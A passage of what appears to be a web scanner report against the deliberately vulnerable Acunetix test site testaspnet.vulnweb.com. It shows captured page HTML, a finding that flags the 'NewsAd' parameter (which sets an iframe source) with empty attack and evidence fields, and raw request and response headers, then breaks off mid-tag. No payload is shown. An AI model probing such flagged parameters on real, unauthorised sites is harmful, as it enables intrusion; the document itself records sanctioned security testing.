value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html
Method	GET
Parameter	NewsAd
Attack
Evidence
Show / hide Request and Response
Request Header - size: 484 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3&NewsAd=ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:42:24 GMT Content-Length: 18040
Response Body - size: 18,040 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3&NewsAd=ads%2fdef.html" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO/ZZOlJz58" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV> <DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently, therefore it is not recommended that the same beta version is used for more than 30 days. To beta-test beyond 30 days, users should install the latest beta version or, if available, use the release version.</p> <p><strong>About Acunetix Web Vulnerability Scanner</strong><br /> Acunetix Web Vulnerability Scanner, a unique web application scanning product that makes securing one’s website easier than ever. Acunetix Web Vulnerability Scanner is an automated web application security testing tool that crawls an entire website and attacks it so as to identify potential weaknesses before hackers do. Further information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a 